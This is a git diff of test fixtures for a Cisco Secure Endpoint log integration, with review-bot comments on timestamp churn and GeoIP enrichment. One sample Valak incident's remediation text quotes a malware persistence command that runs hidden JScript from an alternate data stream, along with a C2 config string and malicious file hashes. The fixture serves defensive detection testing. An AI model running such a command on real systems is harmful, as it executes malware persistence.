@@ -3811,7 +3811,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222643900Z", + "ingested": "2021-12-14T14:40:34.011403732Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "code": "1107296279", "kind": "alert", 
@@ -3927,7 +3927,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222647400Z", + "ingested": "2021-12-14T14:40:34.011404141Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -3983,7 +3983,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222651900Z", + "ingested": "2021-12-14T14:40:34.011404547Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "code": "554696715", "kind": "alert", 
@@ -4047,7 +4047,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222675100Z", + "ingested": "2021-12-14T14:40:34.011404961Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "code": "554696714", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json index cd5c1bd78da..234e0e34763 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json 
@@ -51,7 +51,7 @@ "event": { "severity": 4, "action": "SecureX Threat Hunting Incident", - "ingested": "2021-12-09T13:35:32.897992800Z", + "ingested": "2021-12-14T14:40:37.784976295Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. 
Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). 
Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. 
Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
(Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. 
Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 
These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "code": "1107296344", "kind": "alert" 
@@ -191,7 +191,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898030200Z", + "ingested": "2021-12-14T14:40:37.784979482Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": 
"1090519054", "kind": "alert", 
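Review bot: The only change in this hunk is the `event.ingested` timestamp, which the test runner stamps afresh on every regeneration, so this fixture will keep producing noise diffs like this one; the same churn appears in the hunks at -294, -382, -480, -576, -672, -768, -864, -960, -1039, -1135, -1214, -1307, -1393, -1479 and -1560. If the pipeline test config for this data stream supports `dynamic_fields`, listing `event.ingested` there would keep the regenerated expected file stable and leave only real output changes (such as the new `destination.geo` blocks further down) in review. As it stands a reviewer cannot tell from the diff alone whether anything other than the ingest time changed in these events.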
@@ -294,7 +294,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898033800Z", + "ingested": "2021-12-14T14:40:37.784980235Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": 
"1090519054", "kind": "alert", @@ -382,7 +382,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898041500Z", + "ingested": "2021-12-14T14:40:37.784980844Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -439,6 +439,18 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.12" }, 
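Review bot: The regenerated expectation now pins `destination.geo` (Bhutan, lat 27.5 / lon 90.5) and `destination.as.number` 35908 for `67.43.156.12` in this hunk and in the -535, -631, -727, -823 and -919 hunks, yet no ingest-pipeline change is visible in this part of the diff, so the enrichment presumably comes from a GeoIP/ASN test database in the updated test stack rather than from the pipeline itself. That dependency is worth stating in the commit description, because running these pipeline tests against a stack without that database would fail on these assertions for reasons unrelated to the pipeline. A short comment in the pipeline test config, e.g. `# destination.geo/as values are resolved from the test stack's GeoIP database`, would make the origin of these fields explicit for the next regeneration.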
@@ -480,7 +492,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898046Z", + "ingested": "2021-12-14T14:40:37.784981393Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", 
@@ -535,6 +547,18 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.12"
 },
